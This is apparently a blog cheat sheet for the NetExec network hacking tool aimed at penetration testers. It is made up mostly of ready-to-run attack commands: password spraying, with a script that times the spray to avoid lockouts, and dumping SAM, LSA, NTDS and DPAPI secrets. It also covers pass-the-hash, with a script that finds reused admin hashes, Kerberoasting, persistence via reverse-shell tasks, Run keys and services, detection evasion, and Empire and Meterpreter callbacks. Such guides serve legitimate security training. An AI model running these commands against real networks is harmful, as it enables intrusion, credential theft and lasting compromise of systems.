
NetExec Cheat Sheet: Essential Commands (2025 Guide)

NetExec is the new hacking tool on the block, quickly becoming the go-to tool for penetration testers, red teamers, and cyber security professionals. 

It’s incredibly versatile. It offers all the great features of CrackMapExec but drastically expands on CME’s capabilities.

This NetExec cheat sheet will teach you everything you need to know to use this awesome network hacking tool, including how to use it for enumeration, credential harvesting, gaining initial access, performing lateral movement, and various post-exploitation tasks.

Let’s start. 

What Is NetExec

NetExec (aka nxc) is a network hacking tool designed to help you automate the security assessment of large-scale corporate networks. 

It allows you to perform enumeration, command execution, and post-exploitation within a Windows environment with its rich feature set and support for various network protocols, such as SMB, LDAP, WinRM, and more. 

NetExec was born out of the famous CrackMapExec hacking tool. 

CrackMapExec, known as the “Swiss Army knife” for targeting Windows Active Directory environments, was extensively used in the penetration testing community. However, in 2023, the project was archived, and maintenance stopped. 

To carry on this project’s legacy and extend and improve its functionalities, contributors to the original project decided to fork the code and continue the project under a new name, NetExec. 

They aim to sustain a community-driven and well-maintained project with regular updates that penetration testers, red teamers, and aspiring hackers can use in the years to come. 

With this goal in mind, NetExec offers users the following key features: 

  • Remote command execution: NetExec lets you execute arbitrary commands on remote machines over several protocols, including SMB (through the wmiexec, smbexec, atexec, or mmcexec methods), WinRM, WMI, MSSQL (via xp_cmdshell), and SSH, as either cmd.exe or PowerShell commands.
  • Network enumeration: NetExec can gather information about network-connected systems, including which hosts answer on a protocol's port, shares, users, groups, sessions, and domain details. This lets you understand the network's layout, spot weak configurations (for example, hosts that don't require SMB signing), and pick targets.
  • Post-exploitation capabilities: NetExec has a range of post-exploitation capabilities, such as automating repetitive tasks, deploying scripts, extracting data, performing lateral movement, and impersonating Windows access tokens. These capabilities make it ideal once you gain initial access during a penetration test.
  • Powerful modules: NetExec comes with various modules you can use to automate common hacking tasks, such as checking for known weaknesses, downloading/uploading files, and performing Active Directory enumeration.
  • Integrations: NetExec integrates with other post-exploitation tools and frameworks, such as Metasploit, PowerShell Empire, and BloodHound. You can use it to launch Empire and Metasploit payloads on hosts you control and to collect BloodHound data, and its results database (nxcdb) keeps track of the hosts and credentials you gather along the way.

These features go above and beyond the original CrackMapExec project with new modules, wider network protocol support, and improved efficiency. Let’s explore how you can use NetExec, dubbed by many as “CrackMapExec on steroids.”

Installing NetExec Tutorial

NetExec is primarily built in Python, offering numerous Python-specific installation options. 

However, it’s also included in the Kali Linux repositories, so you can easily install it with the apt package manager. 

Installing NetExec with package manager

To install NetExec on Kali Linux, run the following commands:

sudo apt update

sudo apt install netexec

Installing NetExec as a Python package

To install NetExec as a Python package, first install pipx, the Python application installer, with the command: sudo apt install pipx git

Next, run the following commands to install NetExec in an isolated environment for your user. pipx also puts the nxc and nxcdb commands on your PATH (nxcdb is the console for NetExec's results database):

pipx ensurepath

pipx install git+https://github.com/Pennyw0rth/NetExec

Open a new shell so the PATH change takes effect, then run nxc.

Installing NetExec from GitHub

If you want the bleeding-edge version of NetExec, you can install it from the source by cloning the GitHub repository and using the Poetry package installer—which NetExec uses to manage dependencies.

First, install Poetry with the following commands:

apt install pipx git

pipx ensurepath

pipx install poetry

poetry self add "poetry-dynamic-versioning[plugin]"

poetry dynamic-versioning enable

Next, clone the NetExec GitHub repository and use Poetry to install its dependencies:

git clone https://github.com/Pennyw0rth/NetExec

cd NetExec

poetry install

poetry run NetExec

Once NetExec is installed, you’re ready to dive in and get your hands dirty.

General NetExec Syntax and Options

All NetExec commands follow the syntax: nxc [runtime options] PROTOCOL TARGET [options] [-M module] [-o module options]. Run nxc PROTOCOL -h (for example, nxc smb -h) to see every option a protocol accepts, and nxc PROTOCOL -L to list its modules.

Component / Description / Examples

[runtime options]
    Runtime options control how the scan runs rather than what it does.
    -h displays the help menu
    -t THREADS sets the number of concurrent threads
    --timeout TIMEOUT sets a maximum timeout in seconds for each thread
    --jitter INTERVAL adds a random delay between connections (useful against lockouts and rate-based detections)

PROTOCOL
    NetExec can interact with various network protocols. Each can be used to perform specific tasks related to enumeration, exploitation, or lateral movement.
    smb, ldap, winrm, rdp, mssql, ssh, wmi, vnc, ftp

TARGET
    The IP address, network range, hostname, or file of targets (one per line) for the machine(s) you're attacking. Several targets can be given separated by spaces.
    192.168.1.100
    10.0.39.0/24
    webserver1
    targets.txt

[options]
    Options are specific to the protocol you're targeting, but there are common ones you'll see.
    -u USER for the username (a single name, a comma-separated list, or a file)
    -p PASSWORD for the password (same forms as -u)
    -h shows the help for that protocol (e.g., nxc smb -h)
    -x COMMAND executes a command on the target
    -X PS_COMMAND executes a PowerShell command

[-M module]
    Each protocol NetExec supports has various modules that you can use to exploit weaknesses, target credentials, or gather information. Some only need a low-privileged account; others require admin access on the target.
    -M add-computer adds or deletes a domain computer account
    -M firefox dumps credentials from Firefox
    -M rdp enables or disables RDP
    -M reg-query performs a registry query on the machine
    -L lists the available modules for that protocol

[-o module options]
    These options are specific to the module you run and are set with the syntax OPTION=value (several can follow one -o, separated by spaces).
    -o NAME=COMPUTERNAME specifies the name of the computer account to add
    -o DELETE=True sets a Boolean option to true (here, to delete the computer instead of adding it)
    -M MODULE --options displays the module's options

Discovery and Enumeration With NetExec

Many of NetExec's most powerful capabilities sit under its smb protocol, which lets you discover machines, enumerate network information, and execute commands on remote hosts.

You can use it to identify live hosts and collect data on domain users, groups, network shares, computers, and active sessions. 

If these built-in options aren't enough, you can also execute arbitrary Windows Management Instrumentation (WMI) queries against a host to gather information such as local accounts, services, and running processes.

Command / Description

nxc PROTOCOL TARGET
    Connects to each target on that protocol's port (smb, winrm, ldap, ssh, rdp, mssql, ftp, and so on) without credentials, so a sweep of a range identifies live hosts that expose the service. It is a service check, not a port scanner. For smb it also prints the hostname, domain, OS build, and whether SMB signing is required.

nxc smb TARGET -u USER -p PASSWORD --users [USER]
    Enumerates domain users. If a user is specified, more information is returned (e.g., description, last password set, bad password count). Use --loggedon-users to view users logged onto the target machine and --pass-pol to read the domain password and lockout policy.

nxc smb TARGET -u USER -p PASSWORD --groups [GROUP]
    Enumerates domain groups. If a group is specified, its members are returned. Use --local-groups to view groups local to the target machine.

nxc smb TARGET -u USER -p PASSWORD --computers [COMPUTER]
    Enumerates domain computer accounts (workstations and servers).

nxc smb TARGET -u USER -p PASSWORD --shares
    Enumerates shares and the access (READ and/or WRITE) your account has on each.

nxc smb TARGET -u USER -p PASSWORD -M spider_plus
    Crawls every readable share and lists all files (name, size, timestamps) into a JSON report. Add -o DOWNLOAD_FLAG=True to also download them; the default only lists.

nxc smb TARGET -u USER -p PASSWORD --sessions
    Enumerates active sessions (users currently connected to the host's shares, who you could target).

nxc smb TARGET -u USER -p PASSWORD --wmi QUERY
    Executes the given WMI query (e.g., --wmi "SELECT Name FROM Win32_Service") to enumerate specific information about the host.
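After an unauthenticated sweep you usually want to post-process the banner lines nxc prints rather than read them by eye. The shell functions below are an added example, not NetExec's own code: they parse the line nxc smb prints for each host into a small inventory and pick out the hosts where SMB signing is not required, which are the hosts an NTLM relay can be pointed at. The sample output is constructed, with made-up hostnames and addresses. NetExec has --gen-relay-list FILE for exactly this list; the awk shows what that filter keys on and gives you the rest of the banner as well.

```shell
#!/bin/sh
# Added example (not NetExec code): post-process "nxc smb TARGETS" banner lines.
# Constructed sample of an unauthenticated /24 sweep; hosts and IPs are made up.
SAMPLE_SWEEP='SMB         10.0.39.5       445    DC01             [*] Windows Server 2019 Build 17763 x64 (name:DC01) (domain:corp.local) (signing:True) (SMBv1:False)
SMB         10.0.39.21      445    FS01             [*] Windows Server 2016 Build 14393 x64 (name:FS01) (domain:corp.local) (signing:False) (SMBv1:True)
SMB         10.0.39.37      445    WS-ADAM          [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS-ADAM) (domain:corp.local) (signing:False) (SMBv1:False)
SMB         10.0.39.60      445    NAS01            [*] Unix - Samba (name:NAS01) (domain:WORKGROUP) (signing:False) (SMBv1:False)'

# inventory: read nxc smb banner lines on stdin, print "ip name domain signing smbv1".
# Keyed on the "(key:value)" fields so the free-text OS string cannot throw it off.
inventory() {
  awk '$1 == "SMB" && $5 == "[*]" {
    ip = $2; name = ""; dom = ""; sign = ""; v1 = ""
    while (match($0, /\([A-Za-z0-9]+:[^)]*\)/)) {
      kv = substr($0, RSTART + 1, RLENGTH - 2)
      $0 = substr($0, RSTART + RLENGTH)
      split(kv, a, ":")
      if (a[1] == "name") name = a[2]
      else if (a[1] == "domain") dom = a[2]
      else if (a[1] == "signing") sign = a[2]
      else if (a[1] == "SMBv1") v1 = a[2]
    }
    print ip, name, dom, sign, v1
  }'
}

# relay_targets: IPs where signing is not required, i.e. where a relayed NTLM
# session is accepted. Hosts that require signing reject relayed sessions.
relay_targets() {
  inventory | awk '$4 == "False" { print $1 }'
}

# Usage:  nxc smb 10.0.39.0/24 | tee sweep.log | inventory
#         relay_targets < sweep.log > relay_targets.txt
```

Feed the functions the saved output of a real sweep (tee it to a file as in the usage comment); the domain controller in the sample is excluded from the relay list because it enforces signing, which is the default on DCs.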

Credential Harvesting and Brute Forcing With NetExec

NetExec is capable of performing various password and credential harvesting attacks. It can run arbitrary commands to gather information, execute password spraying against entire subnets, and dump credential data. 

Command / Description

nxc smb TARGET -u USER -p PASSWORD -x 'net localgroup administrators'
    Lists the members of the local Administrators group on each host. Because -x needs local admin rights on the target, the hosts that answer are also the ones where your account is an administrator.

nxc smb TARGET -u USER -p PASSWORD -X 'Get-LocalGroupMember -Group "Administrators"'
    The same, using PowerShell.

nxc ldap DC -u USER -p PASSWORD -M whoami
    Queries LDAP for the authenticated account's details (whether it is enabled, password expiry, last logon, group membership). Useful for checking what a freshly found credential is worth.

nxc PROTOCOL TARGET -u USERS -p PASSWORDS
    Password guessing against TARGET. USERS can be a single user, a comma-separated list of usernames, or a file containing usernames; the same goes for PASSWORDS. Note that by default nxc tries every password against every user, which is a brute force rather than a spray, so read the lockout policy first (nxc smb DC -u USER -p PASSWORD --pass-pol) and keep the number of passwords per user below the lockout threshold. Use the runtime options above (-t, --jitter, --timeout) to tune your attack and avoid getting locked out or detected.

nxc PROTOCOL TARGET -u USERS -p PASSWORDS --port PORT
    If the service is not running on its standard port, use the --port option to specify the custom port.

nxc PROTOCOL TARGET -u USERS -p PASSWORDS --no-bruteforce
    To try username and password pairs line by line (user1:password1, user2:password2) rather than every combination of the two lists, use the --no-bruteforce option.

nxc PROTOCOL TARGET -u USERS -p PASSWORDS --continue-on-success
    To keep guessing after the first valid login, rather than stopping at the first hit, use the --continue-on-success option.

nxc PROTOCOL TARGET -u USER -p PASSWORD --sam
    Dumps SAM hashes from the target system after a successful login. Requires local admin; works over smb or winrm.

nxc PROTOCOL TARGET -u USER -p PASSWORD --lsa
    Dumps LSA secrets (cached domain credentials, service account passwords, machine account secrets) from the target system after a successful login. Requires local admin; works over smb or winrm.

nxc smb DC -u USER -p PASSWORD --ntds [vss|drsuapi]
    Dumps the NTDS.dit contents from the target Domain Controller after a successful login. You can use either vss (copies the file via a shadow copy) or drsuapi (replicates the secrets over RPC, the default and quieter of the two) as the method. Use the --user option to dump only a specific account. Needs Domain Admin-level rights or, for drsuapi, the replication (DCSync) privileges.

nxc smb TARGET -u USER -p PASSWORD --dpapi [cookies|nosystem]
    Dumps DPAPI-protected secrets (saved credentials, browser secrets) from the target machine. Use the cookies option to also dump browser cookies, or nosystem to skip the SYSTEM DPAPI secrets (better opsec).
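The spraying rows above leave the lockout arithmetic to you. The script below is an added example, not part of NetExec: it wraps nxc so that one password is tried across every user per round and no more than (threshold minus one) rounds run inside one observation window, then pulls the distinct hits out of the log. It assumes users.txt holds one account per line and that you have read the threshold and window from --pass-pol first; the NXC variable names the nxc binary and is only there so the loop can be dry-run against a stub.

```shell
#!/bin/sh
# Added example (not NetExec code): a lockout-aware spray loop around nxc.
# Assumptions: USERS is a file with one account per line; THRESHOLD and WINDOW
# come from the domain's lockout policy, read first with
#   nxc smb DC01 -u USER -p PASSWORD --pass-pol
# NXC names the nxc binary and can be pointed at a stub for a dry run.

# spray PROTOCOL TARGET USERS THRESHOLD WINDOW_SECONDS LOG PASSWORD...
# One password per round across every user, and never more than THRESHOLD-1
# rounds inside one observation window, so nobody gets locked out.
spray() {
  proto=$1; target=$2; users=$3; threshold=$4; window=$5; log=$6
  shift 6
  budget=$((threshold - 1))
  tried=0
  : > "$log"
  for pw in "$@"; do
    if [ "$budget" -gt 0 ] && [ "$tried" -ge "$budget" ]; then
      sleep "$window"
      tried=0
    fi
    "${NXC:-nxc}" "$proto" "$target" -u "$users" -p "$pw" --continue-on-success >> "$log" 2>&1
    tried=$((tried + 1))
  done
  successes "$log"
}

# successes LOG: distinct "[+] DOMAIN\user:password" hits from nxc output,
# tagged "admin" when nxc printed (Pwn3d!) after the credential.
successes() {
  grep -F '[+]' "$1" | awk '{ printf "%s%s\n", $6, ($7 == "(Pwn3d!)" ? " admin" : "") }' | sort -u
}

# Usage: spray smb 10.0.39.5 users.txt 5 1800 spray.log 'Winter2025!' 'Spring2025!'
```

A threshold of 0 (no lockout policy) disables the pause. The log keeps the raw nxc output, so failures with a status other than STATUS_LOGON_FAILURE (for example, STATUS_PASSWORD_EXPIRED or STATUS_ACCOUNT_DISABLED) are still there to review afterwards.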

Gaining Access and Lateral Movement With NetExec

NetExec can allow you to gain access to target systems through SMB, WinRM, and LDAP using usernames, passwords, hashes, or Kerberos tickets. This makes it a great hacking tool for performing pass-the-hash and pass-the-ticket attacks. 

Using these protocols, you can also execute custom commands against single or multiple machines at once. Because this rides on the same administrative protocols the environment already uses, the traffic itself looks ordinary, but the execution methods leave well-known traces (a new service for smbexec, a scheduled task for atexec, a child process of WmiPrvSE.exe for wmiexec), so pick the method with the target's detection stack in mind.

Command / Description

nxc PROTOCOL TARGET -u USER -p PASSWORD --sam
    Dumps SAM hashes from the target system after a successful login; the NT hashes can then be used directly in a pass-the-hash attack. Works over smb or winrm.

nxc ldap DC -u USER -p PASSWORD --asreproast OUTPUT_FILE
    Requests AS-REP responses for accounts that have Kerberos pre-authentication disabled and writes them to OUTPUT_FILE in a format Hashcat cracks (mode 18200). Given only a list of usernames and no password (-u users.txt -p ''), it still works, since the KDC answers for those accounts without authentication.

nxc ldap DC -u USER -p PASSWORD --kerberoasting OUTPUT_FILE
    Requests TGS tickets for every account with an SPN and writes them to OUTPUT_FILE ready for Hashcat (mode 13100). Any valid domain credential is enough.

nxc PROTOCOL TARGET -u USER -H NTHASH
    You can log in using NTLM hashes for protocols that use NTLM (e.g., winrm, rdp, smb, ldap, mssql). Use the -H option followed by a single NT hash, a comma-separated list of hashes, or a file containing hashes. This is known as a pass-the-hash attack and is used for lateral movement.

nxc PROTOCOL HOSTNAME -u USER -p PASSWORD -k
nxc PROTOCOL HOSTNAME --use-kcache
    Kerberos authentication. -k authenticates over Kerberos with the supplied password, NT hash (-H), or AES key (--aesKey KEY) instead of NTLM. To use a ticket you already hold (pass-the-ticket), export KRB5CCNAME=/path/to/ticket.ccache and add --use-kcache. In both cases the target must be given as its hostname, not its IP address, because Kerberos service tickets are issued for names.

nxc PROTOCOL TARGET -u USER -p PASSWORD -x COMMAND
    Executes the specified command on the target machine after a successful login. Use the --no-output option to not retrieve the command output.

nxc PROTOCOL TARGET -u USER -p PASSWORD -X PS_COMMAND
    Executes a PowerShell command (PS_COMMAND) on the systems after a successful login.

nxc smb TARGET -u USER -p PASSWORD --exec-method METHOD -x COMMAND
    Executes the specified command on the target machine using a specific method. METHOD can be wmiexec (the default, process creation over WMI), smbexec (creates a temporary service), atexec (creates a scheduled task), or mmcexec (DCOM through the MMC20.Application object). If one method is blocked or detected, try another.

nxc PROTOCOL TARGET -u USER -p PASSWORD
    Lateral movement: log in to a remote system using the stolen username and password. A (Pwn3d!) tag in the output means the account is an administrator on that host.
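The rows above show how to dump SAM hashes and how to pass them, but not how to decide where a dumped hash is worth passing. The shell functions below are an added example, not NetExec's own code: they read the lines --sam prints for several hosts, find every local Administrator (RID 500) NT hash that appears on more than one machine, and build the pass-the-hash command to confirm the reuse. The sample output is constructed; the hosts are made up and the NT hashes are the well-known values for "password" (8846f7...), "123456" (2b576a...), and the empty password (31d6cf...).

```shell
#!/bin/sh
# Added example (not NetExec code): spot local Administrator (RID 500) hash reuse
# across hosts dumped with "nxc smb TARGETS -u USER -p PASSWORD --sam", then build
# the pass-the-hash command to test it. Constructed sample: hosts are made up and
# the NT hashes are the well-known ones for "password", "123456" and "" (empty).
SAMPLE_SAM='SMB         10.0.39.21      445    FS01             Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB         10.0.39.21      445    FS01             Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB         10.0.39.21      445    FS01             [+] Added 2 SAM hashes to the database
SMB         10.0.39.37      445    WS-ADAM          Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
SMB         10.0.39.37      445    WS-ADAM          adam:1001:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
SMB         10.0.39.60      445    APP02            Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::'

# rid500_reuse: read --sam output on stdin; print "NTHASH ip ip ..." for every
# RID 500 NT hash seen on more than one host. The RID is used rather than the
# account name because the built-in Administrator account may be renamed.
rid500_reuse() {
  awk '$1 == "SMB" && split($5, f, ":") >= 4 && f[2] == "500" {
    nt = f[4]
    if (!(nt in hosts)) order[++n] = nt
    hosts[nt] = hosts[nt] " " $2
    count[nt]++
  }
  END {
    for (i = 1; i <= n; i++) if (count[order[i]] > 1) print order[i] hosts[order[i]]
  }'
}

# pth_cmds: one nxc pass-the-hash line per reused hash. --local-auth is needed
# because these are local, not domain, accounts. Run the command against every
# host in scope, not only the ones already dumped, and look for (Pwn3d!).
pth_cmds() {
  rid500_reuse | awk '{ nt = $1; $1 = ""; sub(/^ +/, "")
    print "nxc smb " $0 " -u Administrator -H " nt " --local-auth" }'
}

# Usage: nxc smb hosts.txt -u USER -p PASSWORD --sam | tee sam.log
#        pth_cmds < sam.log
```

A RID 500 hash shared by several machines usually means the image or deployment script set the same local administrator password everywhere, which is exactly the situation LAPS exists to prevent; the -M laps row later on the page is the counterpart check from the domain side.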

Post-Exploitation With NetExec

After gaining access to a target machine, you must start the post-exploitation stage of your penetration test. NetExec is the perfect tool for the job. It can help you establish persistence, gather information on networks, systems, and installed applications, and even upload and download files. 

Command / Description

nxc smb TARGET -u USER -p PASSWORD -M rdp -o ACTION=enable
    Enables RDP on the target machine after a successful login (ACTION=disable turns it off again). Useful for getting an interactive session on the target.

nxc smb TARGET -u USER -p PASSWORD -M impersonate
    Logs in and lists the access tokens of logged-on users that you can impersonate; with -o TOKEN=N EXEC='command' it runs a command under the chosen token, which lets you act as a domain user who happens to be logged on.

nxc smb TARGET -u USER -p PASSWORD -M install_elevated
    Checks the AlwaysInstallElevated registry values under HKLM and HKCU. When both are set, any user can install an MSI package as SYSTEM, which is a straightforward local privilege escalation.

nxc smb TARGET -u USER -p PASSWORD -M enum_av
    Gathers information on the anti-virus and endpoint detection solutions installed on the machine (the module was called enum_avproducts in CrackMapExec; run -L to confirm the name in your build).

nxc smb TARGET -u USER -p PASSWORD -M enum_dns
    Logs in and uses WMI to dump the DNS zones from an AD DNS server.

nxc smb TARGET -u USER -p PASSWORD -M get_netconnections
    Uses WMI to list the target machine's current network connections.

nxc smb TARGET -u USER -p PASSWORD -M keepass_discover
    Searches for KeePass-related files and processes from which you could steal credentials.

nxc ldap DC -u USER -p PASSWORD -M get-network
    Queries the domain's DNS records through LDAP and writes hostnames with their IP addresses to a file, giving you a host list without scanning.

nxc ldap DC -u USER -p PASSWORD -M laps
    Retrieves Windows Local Administrator Password Solution (LAPS) passwords for the computers your account is allowed to read them for.

nxc mssql TARGET -u USER -p PASSWORD -M mssql_priv
    Enumerates and, where possible, exploits MSSQL privilege paths (impersonation and trustworthy database links) to reach sysadmin.

nxc smb TARGET -u USER -p PASSWORD --get-file REMOTE LOCAL
    Downloads a file from the target machine (e.g., --get-file '\Windows\Temp\creds.txt' creds.txt). REMOTE is relative to the share, C$ unless you set --share SHARE.

nxc smb TARGET -u USER -p PASSWORD --put-file LOCAL REMOTE
    Uploads a local file to the target machine (e.g., --put-file backdoor.exe '\Windows\Temp\backdoor.exe'). REMOTE is again relative to the share.

nxc PROTOCOL TARGET -u USER -p PASSWORD -x 'schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr PAYLOAD'
    Persistence: creates a scheduled task on the target system that executes a reverse shell PAYLOAD at the given interval (or, with /sc onlogon or onstart, at a system event) after uploading the PAYLOAD to the machine first.

nxc PROTOCOL TARGET -u USER -p PASSWORD -x 'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v NAME /t REG_SZ /d "PAYLOAD"'
    Persistence: registers a PAYLOAD in the Run key so it executes when a user logs in, after uploading the PAYLOAD to the machine first.

nxc smb TARGET -u USER -p PASSWORD --put-file PAYLOAD '\Users\USERNAME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PAYLOAD'
    Persistence: drops a PAYLOAD in the user's Startup folder, which is executed when that user logs in. Give the full profile path: --put-file writes over SMB relative to the share, and nothing on the server expands variables such as %APPDATA%.

nxc PROTOCOL TARGET -u USER -p PASSWORD -x 'sc create NAME binPath= "PAYLOAD" start= auto'
    Persistence: installs a service on the target system that executes a PAYLOAD at start-up, after uploading the PAYLOAD to the machine first. Note the space after binPath= and start=, which sc.exe requires.
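The --get-file and --put-file rows share one gotcha: the remote path is relative to a share, not a full Windows path, and a startup-folder drop written with %APPDATA% fails silently for that reason. The helper below is an added example, not NetExec's own code: it turns the path you would type on the host into the --share value and relative path nxc wants, mapping drive letters to the administrative share (D:\x becomes --share D$ with \x) and UNC paths to the named share, and refusing anything it cannot resolve, such as an environment variable.

```shell
#!/bin/sh
# Added example (not NetExec code): map a full Windows path to the
# "--share SHARE" value and share-relative path that --get-file/--put-file use.
# Drive paths map to the admin share (C:\x -> C$ and \x); UNC paths
# (\\host\share\x) map to the named share. %VAR% paths are rejected because
# nothing server-side expands them.

# split_path PATH  -> prints the share on line 1 and the relative path on line 2
split_path() {
  p=$1
  case "$p" in
    [A-Za-z]:\\*)
      share="$(printf '%s\n' "$p" | cut -c1 | tr a-z A-Z)\$"
      rel=$(printf '%s\n' "$p" | cut -c3-)
      ;;
    \\\\*)
      share=$(printf '%s\n' "$p" | sed 's/^\\\\[^\\]*\\\([^\\]*\).*/\1/')
      rel=$(printf '%s\n' "$p" | sed 's/^\\\\[^\\]*\\[^\\]*//')
      ;;
    *)
      printf 'split_path: need a drive-letter or UNC path, got %s\n' "$p" >&2
      return 1
      ;;
  esac
  printf '%s\n%s\n' "$share" "$rel"
}

share_of() { split_path "$1" | sed -n 1p; }
rel_of()   { split_path "$1" | sed -n 2p; }

# Usage (quotes keep the backslashes and spaces intact):
#   f='C:\Users\adam\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.exe'
#   nxc smb 10.0.39.37 -u USER -p PASSWORD --share "$(share_of "$f")" --put-file update.exe "$(rel_of "$f")"
```

Keep the path in single quotes on the nxc command line as well; unquoted, the shell eats the backslashes, which is why cheat sheets often show them doubled.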

NetExec Advanced Techniques

NetExec has many advanced features that distinguish it from its predecessor, CrackMapExec. These include running a built-in Bloodhound collector for Active Directory enumeration, extracting Microsoft Teams information, and taking screenshots of target systems through RDP.

Command / Description

nxc PROTOCOL TARGET -u USER -p PASSWORD -X PS_COMMAND --obfs
    Obfuscates the PowerShell script or command before it is run, to get past simple signature-based detections.

nxc ldap DC -u USER -p PASSWORD --bloodhound -c All --dns-server DC_IP
    Runs NetExec's built-in BloodHound collector against the domain and writes the collected JSON into a zip you can import into BloodHound. Point --dns-server at a domain controller so hostnames resolve, and add --dns-tcp if UDP DNS is filtered.

nxc smb TARGET -u USER -p PASSWORD -M teams_localdb
    Reads the local Microsoft Teams database of logged-on users and retrieves the cleartext SSO cookie, which gives access to their user, message, and group information.

nxc mssql TARGET -u USER -p PASSWORD --local-auth -x whoami
    Executes Windows commands on an MSSQL server through xp_cmdshell (this needs sysadmin rights). --local-auth authenticates as a SQL login rather than a Windows account.

nxc rdp TARGET -u USER -p PASSWORD --screenshot [--screentime SECONDS]
    Takes a screenshot of the target's desktop over RDP; --screentime sets how long to wait before capturing. If Network Level Authentication (NLA) is disabled, --nla-screenshot captures the logon screen without credentials.

nxc PROTOCOL TARGET -u USER -p PASSWORD -M empire_exec -o LISTENER=NAME
    Logs in to a remote system using a stolen username and password and automatically generates and executes a PowerShell Empire launcher that calls back to the named Empire listener. This lateral movement command gives you an Empire agent on the system.

nxc PROTOCOL TARGET -u USER -p PASSWORD -M met_inject -o SRVHOST=IP SRVPORT=PORT
    Logs in to a remote system using a stolen username and password and injects a Meterpreter stager into memory, fetched from a Metasploit web_delivery handler listening on SRVHOST:SRVPORT. This gives you a Meterpreter session on the system.

NetExec Cheat Sheet Conclusion

This cheat sheet includes everything you need to get started with NetExec. You now know how to perform enumeration, credential harvesting, and post-exploitation, all with one powerful hacking tool. 

It’s time to trade in your old CrackMapExec and use NetExec for all your network penetration testing needs.

If you want to learn more about network penetration testing, red teaming, and ethical hacking, check out the StationX Accelerator Program. It includes everything you need to jumpstart your cyber security career with professional mentorship, a tailored career roadmap, a vibrant community, and 1,000+ courses and labs. 

  • Adam is a seasoned cyber security professional with extensive experience in cyber threat intelligence and threat hunting. He enjoys learning new tools and technologies, and holds numerous industry qualifications on both the red and blue sides. Adam aims to share the unique insights he has gained from his experiences through his blog articles. You can find Adam on LinkedIn or check out his other projects on LinkTree.

